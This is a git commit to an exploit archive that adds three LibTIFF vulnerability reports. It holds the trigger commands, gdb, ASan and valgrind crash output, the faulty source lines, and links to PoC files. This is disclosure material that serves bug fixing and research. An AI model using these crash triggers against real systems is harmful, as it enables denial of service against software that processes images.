DB: 2017-07-07

3 new exploits

LibTIFF - 'tif_dirwrite.c' Denial of Service
LibTIFF - 'tif_jbig.c' Denial of Service
LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read
This commit is contained in:
Offensive Security 2017-07-07 05:01:20 +00:00
parent 9a0992d704
commit d3536f6bef
4 changed files with 223 additions and 0 deletions

View file

@ -5605,6 +5605,9 @@ id,file,description,date,author,platform,type,port
42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0
42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0
42299,platforms/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0

Can't render this file because it is too large.

87
platforms/linux/dos/42299.txt Executable file
View file

@ -0,0 +1,87 @@
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2712
Triggered by "./tiffset POC1"
$ ./tiffset POC1
TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
poc3: AdobeDeflate compression support is not configured.
tiffset: tif_dirwrite.c:2127: int TIFFWriteDirectoryTagCheckedLong8Array(TIFF
*, uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *): Assertion
`tif->tif_flags&TIFF_BIGTIFF' failed.
Aborted
The gdb debugging information is listed below:
(gdb) set args POC1
(gdb) r
...
(gdb) c
Continuing.
TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
poc2: AdobeDeflate compression support is not configured.
Breakpoint 2, TIFFWriteDirectoryTagCheckedLong8Array (tif=<optimized out>,
ndir=<optimized out>, count=1,
value=0x615c20, dir=<optimized out>, tag=<optimized out>) at
tif_dirwrite.c:2127
2127 assert(tif->tif_flags&TIFF_BIGTIFF);
(gdb) bt
#0 0x00007ffff746a428 in __GI_raise (sig=sig@entry=6) at
../sysdeps/unix/sysv/linux/raise.c:54
#1 0x00007ffff746c02a in __GI_abort () at abort.c:89
#2 0x00007ffff7462bd7 in __assert_fail_base (fmt=<optimized out>,
assertion=assertion@entry=0x7ffff7baf949 "tif->tif_flags&TIFF_BIGTIFF",
file=file@entry=0x7ffff7baf5c0 "tif_dirwrite.c", line=line@entry=2127,
function=function@entry=0x7ffff7baf8e2 "int
TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, uint32 *, TIFFDirEntry *,
uint16, uint32, uint64 *)") at assert.c:92
#3 0x00007ffff7462c82 in __GI___assert_fail (assertion=0x7ffff7baf949
"tif->tif_flags&TIFF_BIGTIFF",
file=0x7ffff7baf5c0 "tif_dirwrite.c", line=2127,
function=0x7ffff7baf8e2 "int TIFFWriteDirectoryTagCheckedLong8Array(TIFF *,
uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *)") at assert.c:101
#4 0x00007ffff7b4e9cb in TIFFWriteDirectoryTagCheckedLong8Array (tif=0x615010,
ndir=<optimized out>, count=1,
value=0x615c20, dir=<optimized out>, tag=<optimized out>) at
tif_dirwrite.c:2127
#5 TIFFWriteDirectoryTagLong8Array (count=1, value=0x615c20, tif=<optimized
out>, ndir=<optimized out>,
dir=<optimized out>, tag=<optimized out>) at tif_dirwrite.c:1462
#6 TIFFWriteDirectorySec (tif=<optimized out>, isimage=<optimized out>,
imagedone=<optimized out>,
pdiroff=<optimized out>) at tif_dirwrite.c:746
#7 0x00007ffff7b4f6b5 in TIFFWriteDirectory (tif=0x615010) at
tif_dirwrite.c:184
#8 TIFFRewriteDirectory (tif=<optimized out>) at tif_dirwrite.c:360
#9 0x0000000000402bc7 in main (argc=<optimized out>, argv=<optimized out>) at
tiffset.c:344
Trigged in line tif_dirwrite.c:2127 at function
TIFFWriteDirectoryTagCheckedLong8Array()
2122 static int
2123 TIFFWriteDirectoryTagCheckedLong8Array(TIFF* tif, uint32* ndir,
TIFFDirEntry* dir, uint16 tag, uint32 count, uint64* value)
2124 {
2125 assert(count<0x20000000);
2126 assert(sizeof(uint64)==8);
2127 assert(tif->tif_flags&TIFF_BIGTIFF);
2128 if (tif->tif_flags&TIFF_SWAB)
2129 TIFFSwabArrayOfLong8(value,count);
2130
return(TIFFWriteDirectoryTagData(tif,ndir,dir,tag,TIFF_LONG8,count,count*8,value));
2131 }
[note]: Tiffset sets the value of a TIFF header to a specified value.It will
modify the raw POC file,so you'd better make a backup file every time you are
going to run.
Credits:
This vulnerability is detected by team OWL337, with our custom fuzzer collAFL.
Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need
more info about the team, the tool or the vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42299.zip

42
platforms/linux/dos/42300.txt Executable file
View file

@ -0,0 +1,42 @@
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2706
Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
The asan debug information is below:
$./tiff2ps $POC
=================================================================
==26627==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1792 byte(s) in 7 object(s) allocated from:
#0 0x7f7c4f1a19aa in malloc
(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
#1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
#2 0x3ea (<unknown module>)
Indirect leak of 170491316224 byte(s) in 223 object(s) allocated from:
#0 0x7f7c4f1a19aa in malloc
(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
#1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
#2 0x3ea (<unknown module>)
SUMMARY: AddressSanitizer: 170491318016 byte(s) leaked in 230 allocation(s).
Affected version:
<=the Latest version (4.0.8)
Credits:
This vulnerability is detected by team OWL337, with our custom fuzzer coll AFL.
Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need more
info about the team, the tool or the vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42300.zip

91
platforms/linux/dos/42301.txt Executable file
View file

@ -0,0 +1,91 @@
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2693
On 4.0.7:
# tiffsplit $FILE
==2007== Invalid read of size 4
==2007== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
==2007== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
==2007== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
==2007== by 0x404CCF: tiffcp (tiffsplit.c:220)
==2007== by 0x404CCF: main (tiffsplit.c:89)
==2007== Address 0x0 is not stack'd, malloc'd or (recently) free'd
------- Comment #1 From zhangtan 2017-05-15 01:20:26 -------
The place of Out of bound read:
ret_val = 0;
for (i = 0; i < td->td_customValueCount; i++) {
TIFFTagValue *tv = td->td_customValues + i;
if (tv->info->field_tag != tag)
continue;
------- Comment #2 From zhangtan 2017-05-15 01:29:10 -------
The place of Out of bound read:
The 1072 line of tif_dir.c
1068 ret_val = 0;
1069 for (i = 0; i < td->td_customValueCount; i++) {
1070 TIFFTagValue *tv = td->td_customValues + i;
1071
1072 if (tv->info->field_tag != tag)
1073 continue;
As tv increased in 1070, Out of bound read happened in 1072 when the pointer tv
was referenced.
------- Comment #3 From zhangtan 2017-05-15 01:46:33 -------
PoC:
Detailed information of the bug can be reproduced using the valgrind tool:
# valgrind tiffsplit $File(the testcase in the attachment)
Error Message:
==23520== Invalid read of size 4
==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
==23520== by 0x404CCF: tiffcp (tiffsplit.c:220)
==23520== by 0x404CCF: main (tiffsplit.c:89)
==23520== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==23520==
==23520==
==23520== Process terminating with default action of signal 11 (SIGSEGV)
==23520== Access not within mapped region at address 0x0
==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
==23520== by 0x404CCF: tiffcp (tiffsplit.c:220)
==23520== by 0x404CCF: main (tiffsplit.c:89)
==23520== If you believe this happened as a result of a stack
==23520== overflow in your program's main thread (unlikely but
==23520== possible), you can try to increase the size of the
==23520== main thread stack using the --main-stacksize= flag.
==23520== The main thread stack size used in this run was 8388608.
==23520==
==23520== HEAP SUMMARY:
==23520== in use at exit: 17,821 bytes in 42 blocks
==23520== total heap usage: 96 allocs, 54 frees, 59,223 bytes allocated
==23520==
==23520== LEAK SUMMARY:
==23520== definitely lost: 0 bytes in 0 blocks
==23520== indirectly lost: 0 bytes in 0 blocks
==23520== possibly lost: 0 bytes in 0 blocks
==23520== still reachable: 17,821 bytes in 42 blocks
==23520== suppressed: 0 bytes in 0 blocks
==23520== Rerun with --leak-check=full to see details of leaked memory
==23520==
==23520== For counts of detected and suppressed errors, rerun with: -v
==23520== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42301.zip